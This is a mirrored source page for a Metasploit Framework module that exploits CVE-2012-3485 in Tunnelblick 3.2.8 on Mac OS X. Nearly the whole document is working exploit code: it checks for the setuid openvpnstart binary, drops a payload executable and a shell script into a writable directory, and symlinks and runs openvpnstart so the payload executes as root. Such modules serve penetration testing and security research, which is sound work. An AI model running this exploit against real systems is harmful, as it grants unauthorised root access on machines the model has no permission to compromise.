Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/setuid_tunnelblick.rb
30483 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::OSX::Priv

10
  include Msf::Post::File

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        {

18
          'Name' => 'Setuid Tunnelblick Privilege Escalation',

19
          'Description' => %q{

20
            This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The

21
            vulnerability exists in the setuid openvpnstart, where an insufficient

22
            validation of path names allows execution of arbitrary shell scripts as root.

23
            This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099

24
            over Mac OS X 10.7.5.

25
          },

26
          'References' => [

27
            [ 'CVE', '2012-3485' ],

28
            [ 'OSVDB', '84706' ],

29
            [ 'EDB', '20443' ],

30
            [ 'URL', 'http://blog.zx2c4.com/791' ]

31
          ],

32
          'License' => MSF_LICENSE,

33
          'Author' => [

34
            'Jason A. Donenfeld', # Vulnerability discovery and original Exploit

35
            'juan vazquez' # Metasploit module

36
          ],

37
          'DisclosureDate' => '2012-08-11',

38
          'Platform' => 'osx',

39
          'SessionTypes' => [ 'shell' ],

40
          'Targets' => [

41
            [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],

42
            [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]

43
          ],

44
          'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },

45
          'DefaultTarget' => 0,

46
          'Notes' => {

47
            'Reliability' => UNKNOWN_RELIABILITY,

48
            'Stability' => UNKNOWN_STABILITY,

49
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
          }

51
        }

52
      )

53
    )

54
    register_options [

55
      # These are not OptPath because it's a *remote* path

56
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

57
      OptString.new('Tunnelblick', [ true, 'Path to setuid openvpnstart executable', '/Applications/Tunnelblick.app/Contents/Resources/openvpnstart' ])

58
    ]

59
  end

60


61
  def base_dir

62
    datastore['WritableDir'].to_s

63
  end

64


65
  def check

66
    unless file? datastore['Tunnelblick']

67
      vprint_error 'openvpnstart not found'

68
      return CheckCode::Safe

69
    end

70


71
    check = cmd_exec("find  #{datastore['Tunnelblick']} -type f -user root -perm -4000")

72


73
    unless check.include? 'openvpnstart'

74
      return CheckCode::Safe

75
    end

76


77
    CheckCode::Vulnerable

78
  end

79


80
  def clean

81
    file_rm(@link)

82
    cmd_exec("rm -rf #{base_dir}/openvpn")

83
  end

84


85
  def exploit

86
    if is_root?

87
      fail_with Failure::BadConfig, 'Session already has root privileges'

88
    end

89


90
    if check != CheckCode::Vulnerable

91
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

92
    end

93


94
    unless writable? base_dir

95
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

96
    end

97


98
    print_status('Creating directory...')

99
    cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"

100


101
    exe_name = rand_text_alpha(8)

102
    @exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"

103
    print_status("Dropping executable #{@exe_file}")

104
    write_file(@exe_file, generate_payload_exe)

105
    cmd_exec "chmod +x #{@exe_file}"

106


107
    evil_sh = <<~EOF

108
      #!/bin/sh

109
      #{@exe_file}

110
    EOF

111


112
    @sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"

113
    print_status("Dropping shell script #{@sh_file}...")

114
    write_file(@sh_file, evil_sh)

115
    cmd_exec "chmod +x #{@sh_file}"

116


117
    link_name = rand_text_alpha(8)

118
    @link = "#{base_dir}/#{link_name}"

119
    print_status("Creating symlink #{@link}...")

120
    cmd_exec "ln -s -f -v #{datastore['Tunnelblick']} #{@link}"

121


122
    print_status('Running...')

123
    begin

124
      cmd_exec "#{@link} OpenVPNInfo 0"

125
    rescue StandardError

126
      print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")

127
      clean

128
      return

129
    end

130
    print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")

131
  end

132
end

133


134